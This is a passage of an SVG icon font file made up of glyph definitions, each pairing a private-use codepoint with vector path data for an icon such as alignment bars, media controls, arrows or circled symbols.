<glyph unicode="&#xe045;" d="M822 1200h-444q-11 0 -19 -7.5t-9 -17.5l-78 -301q-7 -24 7 -45l57 -108q6 -9 17.5 -15t21.5 -6h450q10 0 21.5 6t17.5 15l62 108q14 21 7 45l-83 301q-1 10 -9 17.5t-19 7.5zM1175 800h-150q-10 0 -21 -6.5t-15 -15.5l-78 -156q-4 -9 -15 -15.5t-21 -6.5h-550 q-10 0 -21 6.5t-15 15.5l-78 156q-4 9 -15 15.5t-21 6.5h-150q-10 0 -17.5 -7.5t-7.5 -17.5v-650q0 -10 7.5 -17.5t17.5 -7.5h150q10 0 17.5 7.5t7.5 17.5v150q0 10 7.5 17.5t17.5 7.5h750q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 7.5 -17.5t17.5 -7.5h150q10 0 17.5 7.5 t7.5 17.5v650q0 10 -7.5 17.5t-17.5 7.5zM850 200h-500q-10 0 -19.5 -7t-11.5 -17l-38 -152q-2 -10 3.5 -17t15.5 -7h600q10 0 15.5 7t3.5 17l-38 152q-2 10 -11.5 17t-19.5 7z" />
<glyph unicode="&#xe046;" d="M500 1100h200q56 0 102.5 -20.5t72.5 -50t44 -59t25 -50.5l6 -20h150q41 0 70.5 -29.5t29.5 -70.5v-600q0 -41 -29.5 -70.5t-70.5 -29.5h-1000q-41 0 -70.5 29.5t-29.5 70.5v600q0 41 29.5 70.5t70.5 29.5h150q2 8 6.5 21.5t24 48t45 61t72 48t102.5 21.5zM900 800v-100 h100v100h-100zM600 730q-95 0 -162.5 -67.5t-67.5 -162.5t67.5 -162.5t162.5 -67.5t162.5 67.5t67.5 162.5t-67.5 162.5t-162.5 67.5zM600 603q43 0 73 -30t30 -73t-30 -73t-73 -30t-73 30t-30 73t30 73t73 30z" />
<glyph unicode="&#xe047;" d="M681 1199l385 -998q20 -50 60 -92q18 -19 36.5 -29.5t27.5 -11.5l10 -2v-66h-417v66q53 0 75 43.5t5 88.5l-82 222h-391q-58 -145 -92 -234q-11 -34 -6.5 -57t25.5 -37t46 -20t55 -6v-66h-365v66q56 24 84 52q12 12 25 30.5t20 31.5l7 13l399 1006h93zM416 521h340 l-162 457z" />
<glyph unicode="&#xe048;" d="M753 641q5 -1 14.5 -4.5t36 -15.5t50.5 -26.5t53.5 -40t50.5 -54.5t35.5 -70t14.5 -87q0 -67 -27.5 -125.5t-71.5 -97.5t-98.5 -66.5t-108.5 -40.5t-102 -13h-500v89q41 7 70.5 32.5t29.5 65.5v827q0 24 -0.5 34t-3.5 24t-8.5 19.5t-17 13.5t-28 12.5t-42.5 11.5v71 l471 -1q57 0 115.5 -20.5t108 -57t80.5 -94t31 -124.5q0 -51 -15.5 -96.5t-38 -74.5t-45 -50.5t-38.5 -30.5zM400 700h139q78 0 130.5 48.5t52.5 122.5q0 41 -8.5 70.5t-29.5 55.5t-62.5 39.5t-103.5 13.5h-118v-350zM400 200h216q80 0 121 50.5t41 130.5q0 90 -62.5 154.5 t-156.5 64.5h-159v-400z" />
<glyph unicode="&#xe049;" d="M877 1200l2 -57q-83 -19 -116 -45.5t-40 -66.5l-132 -839q-9 -49 13 -69t96 -26v-97h-500v97q186 16 200 98l173 832q3 17 3 30t-1.5 22.5t-9 17.5t-13.5 12.5t-21.5 10t-26 8.5t-33.5 10q-13 3 -19 5v57h425z" />
<glyph unicode="&#xe050;" d="M1300 900h-50q0 21 -4 37t-9.5 26.5t-18 17.5t-22 11t-28.5 5.5t-31 2t-37 0.5h-200v-850q0 -22 25 -34.5t50 -13.5l25 -2v-100h-400v100q4 0 11 0.5t24 3t30 7t24 15t11 24.5v850h-200q-25 0 -37 -0.5t-31 -2t-28.5 -5.5t-22 -11t-18 -17.5t-9.5 -26.5t-4 -37h-50v300 h1000v-300zM175 1000h-75v-800h75l-125 -167l-125 167h75v800h-75l125 167z" />
<glyph unicode="&#xe051;" d="M1100 900h-50q0 21 -4 37t-9.5 26.5t-18 17.5t-22 11t-28.5 5.5t-31 2t-37 0.5h-200v-650q0 -22 25 -34.5t50 -13.5l25 -2v-100h-400v100q4 0 11 0.5t24 3t30 7t24 15t11 24.5v650h-200q-25 0 -37 -0.5t-31 -2t-28.5 -5.5t-22 -11t-18 -17.5t-9.5 -26.5t-4 -37h-50v300 h1000v-300zM1167 50l-167 -125v75h-800v-75l-167 125l167 125v-75h800v75z" />
<glyph unicode="&#xe052;" d="M50 1100h600q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-600q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 800h1000q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1000q-21 0 -35.5 14.5t-14.5 35.5v100 q0 21 14.5 35.5t35.5 14.5zM50 500h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-800q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 200h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1100 q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe053;" d="M250 1100h700q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-700q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 800h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5v100 q0 21 14.5 35.5t35.5 14.5zM250 500h700q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-700q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 200h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1100 q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe054;" d="M500 950v100q0 21 14.5 35.5t35.5 14.5h600q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-600q-21 0 -35.5 14.5t-14.5 35.5zM100 650v100q0 21 14.5 35.5t35.5 14.5h1000q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1000 q-21 0 -35.5 14.5t-14.5 35.5zM300 350v100q0 21 14.5 35.5t35.5 14.5h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-800q-21 0 -35.5 14.5t-14.5 35.5zM0 50v100q0 21 14.5 35.5t35.5 14.5h1100q21 0 35.5 -14.5t14.5 -35.5v-100 q0 -21 -14.5 -35.5t-35.5 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5z" />
<glyph unicode="&#xe055;" d="M50 1100h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 800h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5v100 q0 21 14.5 35.5t35.5 14.5zM50 500h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1100q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 200h1100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1100 q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe056;" d="M50 1100h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM350 1100h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-800q-21 0 -35.5 14.5t-14.5 35.5v100 q0 21 14.5 35.5t35.5 14.5zM50 800h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM350 800h800q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-800 q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 500h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM350 500h800q21 0 35.5 -14.5t14.5 -35.5v-100 q0 -21 -14.5 -35.5t-35.5 -14.5h-800q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 200h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM350 200h800 q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-800q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe057;" d="M400 0h-100v1100h100v-1100zM550 1100h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM550 800h500q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-500 q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM267 550l-167 -125v75h-200v100h200v75zM550 500h300q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-300q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM550 200h600 q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-600q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe058;" d="M50 1100h100q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM900 0h-100v1100h100v-1100zM50 800h500q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-500 q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM1100 600h200v-100h-200v-75l-167 125l167 125v-75zM50 500h300q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-300q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5zM50 200h600 q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-600q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe059;" d="M75 1000h750q31 0 53 -22t22 -53v-650q0 -31 -22 -53t-53 -22h-750q-31 0 -53 22t-22 53v650q0 31 22 53t53 22zM1200 300l-300 300l300 300v-600z" />
<glyph unicode="&#xe060;" d="M44 1100h1112q18 0 31 -13t13 -31v-1012q0 -18 -13 -31t-31 -13h-1112q-18 0 -31 13t-13 31v1012q0 18 13 31t31 13zM100 1000v-737l247 182l298 -131l-74 156l293 318l236 -288v500h-1000zM342 884q56 0 95 -39t39 -94.5t-39 -95t-95 -39.5t-95 39.5t-39 95t39 94.5 t95 39z" />
<glyph unicode="&#xe062;" d="M648 1169q117 0 216 -60t156.5 -161t57.5 -218q0 -115 -70 -258q-69 -109 -158 -225.5t-143 -179.5l-54 -62q-9 8 -25.5 24.5t-63.5 67.5t-91 103t-98.5 128t-95.5 148q-60 132 -60 249q0 88 34 169.5t91.5 142t137 96.5t166.5 36zM652.5 974q-91.5 0 -156.5 -65 t-65 -157t65 -156.5t156.5 -64.5t156.5 64.5t65 156.5t-65 157t-156.5 65z" />
<glyph unicode="&#xe063;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM600 173v854q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5t57 -214.5 t155.5 -155.5t214.5 -57z" />
<glyph unicode="&#xe064;" d="M554 1295q21 -72 57.5 -143.5t76 -130t83 -118t82.5 -117t70 -116t49.5 -126t18.5 -136.5q0 -71 -25.5 -135t-68.5 -111t-99 -82t-118.5 -54t-125.5 -23q-84 5 -161.5 34t-139.5 78.5t-99 125t-37 164.5q0 69 18 136.5t49.5 126.5t69.5 116.5t81.5 117.5t83.5 119 t76.5 131t58.5 143zM344 710q-23 -33 -43.5 -70.5t-40.5 -102.5t-17 -123q1 -37 14.5 -69.5t30 -52t41 -37t38.5 -24.5t33 -15q21 -7 32 -1t13 22l6 34q2 10 -2.5 22t-13.5 19q-5 4 -14 12t-29.5 40.5t-32.5 73.5q-26 89 6 271q2 11 -6 11q-8 1 -15 -10z" />
<glyph unicode="&#xe065;" d="M1000 1013l108 115q2 1 5 2t13 2t20.5 -1t25 -9.5t28.5 -21.5q22 -22 27 -43t0 -32l-6 -10l-108 -115zM350 1100h400q50 0 105 -13l-187 -187h-368q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v182l200 200v-332 q0 -165 -93.5 -257.5t-256.5 -92.5h-400q-165 0 -257.5 92.5t-92.5 257.5v400q0 165 92.5 257.5t257.5 92.5zM1009 803l-362 -362l-161 -50l55 170l355 355z" />
<glyph unicode="&#xe066;" d="M350 1100h361q-164 -146 -216 -200h-195q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5l200 153v-103q0 -165 -92.5 -257.5t-257.5 -92.5h-400q-165 0 -257.5 92.5t-92.5 257.5v400q0 165 92.5 257.5t257.5 92.5z M824 1073l339 -301q8 -7 8 -17.5t-8 -17.5l-340 -306q-7 -6 -12.5 -4t-6.5 11v203q-26 1 -54.5 0t-78.5 -7.5t-92 -17.5t-86 -35t-70 -57q10 59 33 108t51.5 81.5t65 58.5t68.5 40.5t67 24.5t56 13.5t40 4.5v210q1 10 6.5 12.5t13.5 -4.5z" />
<glyph unicode="&#xe067;" d="M350 1100h350q60 0 127 -23l-178 -177h-349q-41 0 -70.5 -29.5t-29.5 -70.5v-500q0 -41 29.5 -70.5t70.5 -29.5h500q41 0 70.5 29.5t29.5 70.5v69l200 200v-219q0 -165 -92.5 -257.5t-257.5 -92.5h-400q-165 0 -257.5 92.5t-92.5 257.5v400q0 165 92.5 257.5t257.5 92.5z M643 639l395 395q7 7 17.5 7t17.5 -7l101 -101q7 -7 7 -17.5t-7 -17.5l-531 -532q-7 -7 -17.5 -7t-17.5 7l-248 248q-7 7 -7 17.5t7 17.5l101 101q7 7 17.5 7t17.5 -7l111 -111q8 -7 18 -7t18 7z" />
<glyph unicode="&#xe068;" d="M318 918l264 264q8 8 18 8t18 -8l260 -264q7 -8 4.5 -13t-12.5 -5h-170v-200h200v173q0 10 5 12t13 -5l264 -260q8 -7 8 -17.5t-8 -17.5l-264 -265q-8 -7 -13 -5t-5 12v173h-200v-200h170q10 0 12.5 -5t-4.5 -13l-260 -264q-8 -8 -18 -8t-18 8l-264 264q-8 8 -5.5 13 t12.5 5h175v200h-200v-173q0 -10 -5 -12t-13 5l-264 265q-8 7 -8 17.5t8 17.5l264 260q8 7 13 5t5 -12v-173h200v200h-175q-10 0 -12.5 5t5.5 13z" />
<glyph unicode="&#xe069;" d="M250 1100h100q21 0 35.5 -14.5t14.5 -35.5v-438l464 453q15 14 25.5 10t10.5 -25v-1000q0 -21 -10.5 -25t-25.5 10l-464 453v-438q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v1000q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe070;" d="M50 1100h100q21 0 35.5 -14.5t14.5 -35.5v-438l464 453q15 14 25.5 10t10.5 -25v-438l464 453q15 14 25.5 10t10.5 -25v-1000q0 -21 -10.5 -25t-25.5 10l-464 453v-438q0 -21 -10.5 -25t-25.5 10l-464 453v-438q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5 t-14.5 35.5v1000q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe071;" d="M1200 1050v-1000q0 -21 -10.5 -25t-25.5 10l-464 453v-438q0 -21 -10.5 -25t-25.5 10l-492 480q-15 14 -15 35t15 35l492 480q15 14 25.5 10t10.5 -25v-438l464 453q15 14 25.5 10t10.5 -25z" />
<glyph unicode="&#xe072;" d="M243 1074l814 -498q18 -11 18 -26t-18 -26l-814 -498q-18 -11 -30.5 -4t-12.5 28v1000q0 21 12.5 28t30.5 -4z" />
<glyph unicode="&#xe073;" d="M250 1000h200q21 0 35.5 -14.5t14.5 -35.5v-800q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v800q0 21 14.5 35.5t35.5 14.5zM650 1000h200q21 0 35.5 -14.5t14.5 -35.5v-800q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v800 q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe074;" d="M1100 950v-800q0 -21 -14.5 -35.5t-35.5 -14.5h-800q-21 0 -35.5 14.5t-14.5 35.5v800q0 21 14.5 35.5t35.5 14.5h800q21 0 35.5 -14.5t14.5 -35.5z" />
<glyph unicode="&#xe075;" d="M500 612v438q0 21 10.5 25t25.5 -10l492 -480q15 -14 15 -35t-15 -35l-492 -480q-15 -14 -25.5 -10t-10.5 25v438l-464 -453q-15 -14 -25.5 -10t-10.5 25v1000q0 21 10.5 25t25.5 -10z" />
<glyph unicode="&#xe076;" d="M1048 1102l100 1q20 0 35 -14.5t15 -35.5l5 -1000q0 -21 -14.5 -35.5t-35.5 -14.5l-100 -1q-21 0 -35.5 14.5t-14.5 35.5l-2 437l-463 -454q-14 -15 -24.5 -10.5t-10.5 25.5l-2 437l-462 -455q-15 -14 -25.5 -9.5t-10.5 24.5l-5 1000q0 21 10.5 25.5t25.5 -10.5l466 -450 l-2 438q0 20 10.5 24.5t25.5 -9.5l466 -451l-2 438q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe077;" d="M850 1100h100q21 0 35.5 -14.5t14.5 -35.5v-1000q0 -21 -14.5 -35.5t-35.5 -14.5h-100q-21 0 -35.5 14.5t-14.5 35.5v438l-464 -453q-15 -14 -25.5 -10t-10.5 25v1000q0 21 10.5 25t25.5 -10l464 -453v438q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe078;" d="M686 1081l501 -540q15 -15 10.5 -26t-26.5 -11h-1042q-22 0 -26.5 11t10.5 26l501 540q15 15 36 15t36 -15zM150 400h1000q21 0 35.5 -14.5t14.5 -35.5v-100q0 -21 -14.5 -35.5t-35.5 -14.5h-1000q-21 0 -35.5 14.5t-14.5 35.5v100q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe079;" d="M885 900l-352 -353l352 -353l-197 -198l-552 552l552 550z" />
<glyph unicode="&#xe080;" d="M1064 547l-551 -551l-198 198l353 353l-353 353l198 198z" />
<glyph unicode="&#xe081;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM650 900h-100q-21 0 -35.5 -14.5t-14.5 -35.5v-150h-150 q-21 0 -35.5 -14.5t-14.5 -35.5v-100q0 -21 14.5 -35.5t35.5 -14.5h150v-150q0 -21 14.5 -35.5t35.5 -14.5h100q21 0 35.5 14.5t14.5 35.5v150h150q21 0 35.5 14.5t14.5 35.5v100q0 21 -14.5 35.5t-35.5 14.5h-150v150q0 21 -14.5 35.5t-35.5 14.5z" />
<glyph unicode="&#xe082;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM850 700h-500q-21 0 -35.5 -14.5t-14.5 -35.5v-100q0 -21 14.5 -35.5 t35.5 -14.5h500q21 0 35.5 14.5t14.5 35.5v100q0 21 -14.5 35.5t-35.5 14.5z" />
<glyph unicode="&#xe083;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM741.5 913q-12.5 0 -21.5 -9l-120 -120l-120 120q-9 9 -21.5 9 t-21.5 -9l-141 -141q-9 -9 -9 -21.5t9 -21.5l120 -120l-120 -120q-9 -9 -9 -21.5t9 -21.5l141 -141q9 -9 21.5 -9t21.5 9l120 120l120 -120q9 -9 21.5 -9t21.5 9l141 141q9 9 9 21.5t-9 21.5l-120 120l120 120q9 9 9 21.5t-9 21.5l-141 141q-9 9 -21.5 9z" />
<glyph unicode="&#xe084;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM546 623l-84 85q-7 7 -17.5 7t-18.5 -7l-139 -139q-7 -8 -7 -18t7 -18 l242 -241q7 -8 17.5 -8t17.5 8l375 375q7 7 7 17.5t-7 18.5l-139 139q-7 7 -17.5 7t-17.5 -7z" />
<glyph unicode="&#xe085;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM588 941q-29 0 -59 -5.5t-63 -20.5t-58 -38.5t-41.5 -63t-16.5 -89.5 q0 -25 20 -25h131q30 -5 35 11q6 20 20.5 28t45.5 8q20 0 31.5 -10.5t11.5 -28.5q0 -23 -7 -34t-26 -18q-1 0 -13.5 -4t-19.5 -7.5t-20 -10.5t-22 -17t-18.5 -24t-15.5 -35t-8 -46q-1 -8 5.5 -16.5t20.5 -8.5h173q7 0 22 8t35 28t37.5 48t29.5 74t12 100q0 47 -17 83 t-42.5 57t-59.5 34.5t-64 18t-59 4.5zM675 400h-150q-10 0 -17.5 -7.5t-7.5 -17.5v-150q0 -10 7.5 -17.5t17.5 -7.5h150q10 0 17.5 7.5t7.5 17.5v150q0 10 -7.5 17.5t-17.5 7.5z" />
<glyph unicode="&#xe086;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM675 1000h-150q-10 0 -17.5 -7.5t-7.5 -17.5v-150q0 -10 7.5 -17.5 t17.5 -7.5h150q10 0 17.5 7.5t7.5 17.5v150q0 10 -7.5 17.5t-17.5 7.5zM675 700h-250q-10 0 -17.5 -7.5t-7.5 -17.5v-50q0 -10 7.5 -17.5t17.5 -7.5h75v-200h-75q-10 0 -17.5 -7.5t-7.5 -17.5v-50q0 -10 7.5 -17.5t17.5 -7.5h350q10 0 17.5 7.5t7.5 17.5v50q0 10 -7.5 17.5 t-17.5 7.5h-75v275q0 10 -7.5 17.5t-17.5 7.5z" />
<glyph unicode="&#xe087;" d="M525 1200h150q10 0 17.5 -7.5t7.5 -17.5v-194q103 -27 178.5 -102.5t102.5 -178.5h194q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-194q-27 -103 -102.5 -178.5t-178.5 -102.5v-194q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v194 q-103 27 -178.5 102.5t-102.5 178.5h-194q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5h194q27 103 102.5 178.5t178.5 102.5v194q0 10 7.5 17.5t17.5 7.5zM700 893v-168q0 -10 -7.5 -17.5t-17.5 -7.5h-150q-10 0 -17.5 7.5t-7.5 17.5v168q-68 -23 -119 -74 t-74 -119h168q10 0 17.5 -7.5t7.5 -17.5v-150q0 -10 -7.5 -17.5t-17.5 -7.5h-168q23 -68 74 -119t119 -74v168q0 10 7.5 17.5t17.5 7.5h150q10 0 17.5 -7.5t7.5 -17.5v-168q68 23 119 74t74 119h-168q-10 0 -17.5 7.5t-7.5 17.5v150q0 10 7.5 17.5t17.5 7.5h168 q-23 68 -74 119t-119 74z" />
<glyph unicode="&#xe088;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM600 1027q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5t57 -214.5 t155.5 -155.5t214.5 -57t214.5 57t155.5 155.5t57 214.5t-57 214.5t-155.5 155.5t-214.5 57zM759 823l64 -64q7 -7 7 -17.5t-7 -17.5l-124 -124l124 -124q7 -7 7 -17.5t-7 -17.5l-64 -64q-7 -7 -17.5 -7t-17.5 7l-124 124l-124 -124q-7 -7 -17.5 -7t-17.5 7l-64 64 q-7 7 -7 17.5t7 17.5l124 124l-124 124q-7 7 -7 17.5t7 17.5l64 64q7 7 17.5 7t17.5 -7l124 -124l124 124q7 7 17.5 7t17.5 -7z" />
<glyph unicode="&#xe089;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM600 1027q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5t57 -214.5 t155.5 -155.5t214.5 -57t214.5 57t155.5 155.5t57 214.5t-57 214.5t-155.5 155.5t-214.5 57zM782 788l106 -106q7 -7 7 -17.5t-7 -17.5l-320 -321q-8 -7 -18 -7t-18 7l-202 203q-8 7 -8 17.5t8 17.5l106 106q7 8 17.5 8t17.5 -8l79 -79l197 197q7 7 17.5 7t17.5 -7z" />
<glyph unicode="&#xe090;" d="M600 1177q117 0 224 -45.5t184.5 -123t123 -184.5t45.5 -224t-45.5 -224t-123 -184.5t-184.5 -123t-224 -45.5t-224 45.5t-184.5 123t-123 184.5t-45.5 224t45.5 224t123 184.5t184.5 123t224 45.5zM600 1027q-116 0 -214.5 -57t-155.5 -155.5t-57 -214.5q0 -120 65 -225 l587 587q-105 65 -225 65zM965 819l-584 -584q104 -62 219 -62q116 0 214.5 57t155.5 155.5t57 214.5q0 115 -62 219z" />
<glyph unicode="&#xe091;" d="M39 582l522 427q16 13 27.5 8t11.5 -26v-291h550q21 0 35.5 -14.5t14.5 -35.5v-200q0 -21 -14.5 -35.5t-35.5 -14.5h-550v-291q0 -21 -11.5 -26t-27.5 8l-522 427q-16 13 -16 32t16 32z" />
<glyph unicode="&#xe092;" d="M639 1009l522 -427q16 -13 16 -32t-16 -32l-522 -427q-16 -13 -27.5 -8t-11.5 26v291h-550q-21 0 -35.5 14.5t-14.5 35.5v200q0 21 14.5 35.5t35.5 14.5h550v291q0 21 11.5 26t27.5 -8z" />
<glyph unicode="&#xe093;" d="M682 1161l427 -522q13 -16 8 -27.5t-26 -11.5h-291v-550q0 -21 -14.5 -35.5t-35.5 -14.5h-200q-21 0 -35.5 14.5t-14.5 35.5v550h-291q-21 0 -26 11.5t8 27.5l427 522q13 16 32 16t32 -16z" />
<glyph unicode="&#xe094;" d="M550 1200h200q21 0 35.5 -14.5t14.5 -35.5v-550h291q21 0 26 -11.5t-8 -27.5l-427 -522q-13 -16 -32 -16t-32 16l-427 522q-13 16 -8 27.5t26 11.5h291v550q0 21 14.5 35.5t35.5 14.5z" />
<glyph unicode="&#xe095;" d="M639 1109l522 -427q16 -13 16 -32t-16 -32l-522 -427q-16 -13 -27.5 -8t-11.5 26v291q-94 -2 -182 -20t-170.5 -52t-147 -92.5t-100.5 -135.5q5 105 27 193.5t67.5 167t113 135t167 91.5t225.5 42v262q0 21 11.5 26t27.5 -8z" />
